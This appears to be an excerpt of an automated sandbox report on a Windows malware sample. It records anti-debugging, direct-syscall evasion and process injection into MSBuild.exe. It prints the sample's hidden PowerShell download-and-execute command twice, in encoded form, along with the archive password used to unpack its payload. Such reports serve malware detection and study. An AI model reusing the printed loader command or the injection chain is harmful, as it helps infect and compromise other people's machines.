Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: powershell.exe, 00000001.00000002.1585418830.0000022CC8890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013CC3A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7013CC3A0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013C8B50 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,SleepEx,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,CreateProcessA,FreeLibrary,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7013C8B50
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D5B30 GetProcessHeap, 0_2_00007FF7013D5B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013CBA00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7013CBA00
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013CC3A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7013CC3A0
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013CC584 SetUnhandledExceptionFilter, 0_2_00007FF7013CC584
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D152C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7013D152C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01628090 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_01628090
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162B0A8 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0162B0A8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01629223 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_01629223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe NtQuerySystemInformation: Direct from: 0xB563A2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe NtProtectVirtualMemory: Direct from: 0x77747B2E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe NtQuerySystemInformation: Direct from: 0xC463A2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe NtProtectVirtualMemory: Direct from: 0x700D2DDD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe NtProtectVirtualMemory: Direct from: 0x6CC82D26 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B9E1000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 5F2008 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B9E1000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FF1008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\zkwindow.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -nop -noni -e"n"c wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamgagac0aygbvahiaiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamwanaaoadqakagyadqbuagmadabpag8abgagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiab7aa0acgagacaaiaagahaayqbyageabqaoafsacwb0ahiaaqbuagcaxqakahaayqbnaguavqbyagwakqanaaoaiaagacaaiaakahiazqbzahaabwbuahmazqagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabwageazwblafuacgbsacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwanaaoaiaagacaaiaakagwaaqbuagsaiaa9acaajabyaguacwbwag8abgbzagualgbmagkabgbrahmaiab8acaavwboaguacgblac0atwbiagoazqbjahqaiab7acaajabfac4aaabyaguazgagac0abqbhahqaywboacaaigbcac4aegbpahaaigagah0aiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0argbpahiacwb0acaamqanaaoaiaagacaaiabpagyaiaaoacqababpag4aawapacaaewanaaoaiaagacaaiaagacaaiaagagkazgagacgajabsagkabgbrac4aaabyaguazgagac0abqbhahqaywboacaaigbeaggadab0ahaacwa/adoalwavaciakqagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahiazqb0ahuacgbuacaajabsagkabgbrac4aaabyaguazganaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaaiaagacaaiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaacgblahqadqbyag4aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauafuacgbpacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbvahiaaqagacqacgblahmacabvag4acwblac4aqgbhahmazqbsaguacwbwag8abgbzagualgbsaguacwbwag8abgbzaguavqbyagkakqasacaajabsagkabgbrac4aaabyaguazgapackalgbbagiacwbvagwadqb0aguavqbyagkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0adqakacaaiaagacaazqbsahmazqagahsadqakacaaiaagacaaiaagacaaiabyaguadab1ahiabgagacqabgb1agwabaanaaoaiaagacaaiab9aa0acgb9aa0acganaaoajabwageazwbladeaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwbhadeamwaxadmaoaa4aduanwa5agqamabdageayqa4adyamgbkadqarqbfadaaiganaaoajabwageazwbladiaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwawadeamaaxadaamqbhadgaoaa1adcaoqbkadaaqwbhageaoaa2adiazaa0aeuarqawaciadqakacqacwblahyazqbuafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamqanaaoajabtageabgbhagcazqbyafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamganaaoaaqbmacaakaatag4abwb0acaajabzaguadgblag4awgbpahaavqbyagwakqagahsaiabyaguadab1ahiabgagah0adqakagkazgagacgalqbuag8adaagacqabqbhag4ayqbnaguacgbaagkacabvahiabaapacaaewagahiazqb0ahuacgbuacaafqanaaoadqakacqacwblahyazqbuafoaaqbwafoaaqbwafaayqb0aggaiaa9acaasgbvagkabgatafaayqb0aggaiaakaguabgb2adoavabfae0auaagacianwb6adeaoqawadaalqb4adyanaauahoaaqbwaciadqakacqacwblahyazqbuafoaaqbwaeuaeab0ahiayqbjahqauabhahqaaaagad0aiabkag8aaqbuac0auabhahqaaaagacqazqbuahyaogbuaeuatqbqacaaiga3ahoaaqbwaciadqakaeka
Source: C:\Users\user\Desktop\zkwindow.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -nop -noni -e"n"c wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamgagac0aygbvahiaiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamwanaaoadqakagyadqbuagmadabpag8abgagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiab7aa0acgagacaaiaagahaayqbyageabqaoafsacwb0ahiaaqbuagcaxqakahaayqbnaguavqbyagwakqanaaoaiaagacaaiaakahiazqbzahaabwbuahmazqagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabwageazwblafuacgbsacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwanaaoaiaagacaaiaakagwaaqbuagsaiaa9acaajabyaguacwbwag8abgbzagualgbmagkabgbrahmaiab8acaavwboaguacgblac0atwbiagoazqbjahqaiab7acaajabfac4aaabyaguazgagac0abqbhahqaywboacaaigbcac4aegbpahaaigagah0aiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0argbpahiacwb0acaamqanaaoaiaagacaaiabpagyaiaaoacqababpag4aawapacaaewanaaoaiaagacaaiaagacaaiaagagkazgagacgajabsagkabgbrac4aaabyaguazgagac0abqbhahqaywboacaaigbeaggadab0ahaacwa/adoalwavaciakqagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahiazqb0ahuacgbuacaajabsagkabgbrac4aaabyaguazganaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaaiaagacaaiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaacgblahqadqbyag4aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauafuacgbpacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbvahiaaqagacqacgblahmacabvag4acwblac4aqgbhahmazqbsaguacwbwag8abgbzagualgbsaguacwbwag8abgbzaguavqbyagkakqasacaajabsagkabgbrac4aaabyaguazgapackalgbbagiacwbvagwadqb0aguavqbyagkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0adqakacaaiaagacaazqbsahmazqagahsadqakacaaiaagacaaiaagacaaiabyaguadab1ahiabgagacqabgb1agwabaanaaoaiaagacaaiab9aa0acgb9aa0acganaaoajabwageazwbladeaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwbhadeamwaxadmaoaa4aduanwa5agqamabdageayqa4adyamgbkadqarqbfadaaiganaaoajabwageazwbladiaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwawadeamaaxadaamqbhadgaoaa1adcaoqbkadaaqwbhageaoaa2adiazaa0aeuarqawaciadqakacqacwblahyazqbuafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamqanaaoajabtageabgbhagcazqbyafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamganaaoaaqbmacaakaatag4abwb0acaajabzaguadgblag4awgbpahaavqbyagwakqagahsaiabyaguadab1ahiabgagah0adqakagkazgagacgalqbuag8adaagacqabqbhag4ayqbnaguacgbaagkacabvahiabaapacaaewagahiazqb0ahuacgbuacaafqanaaoadqakacqacwblahyazqbuafoaaqbwafoaaqbwafaayqb0aggaiaa9acaasgbvagkabgatafaayqb0aggaiaakaguabgb2adoavabfae0auaagacianwb6adeaoqawadaalqb4adyanaauahoaaqbwaciadqakacqacwblahyazqbuafoaaqbwaeuaeab0ahiayqbjahqauabhahqaaaagad0aiabkag8aaqbuac0auabhahqaaaagacqazqbuahyaogbuaeuatqbqacaaiga3ahoaaqbwaciadqakaeka Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D9C20 cpuid 0_2_00007FF7013D9C20
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: GetLocaleInfoW, 11_2_00C60AC0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: GetLocaleInfoW, 11_2_00C60B0C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_00C4AD34
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 11_2_00C4B8AC
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: GetLocaleInfoA, 11_2_01630E53
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: GetKeyboardLayout,GetLocaleInfoA, 11_2_016216F2
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
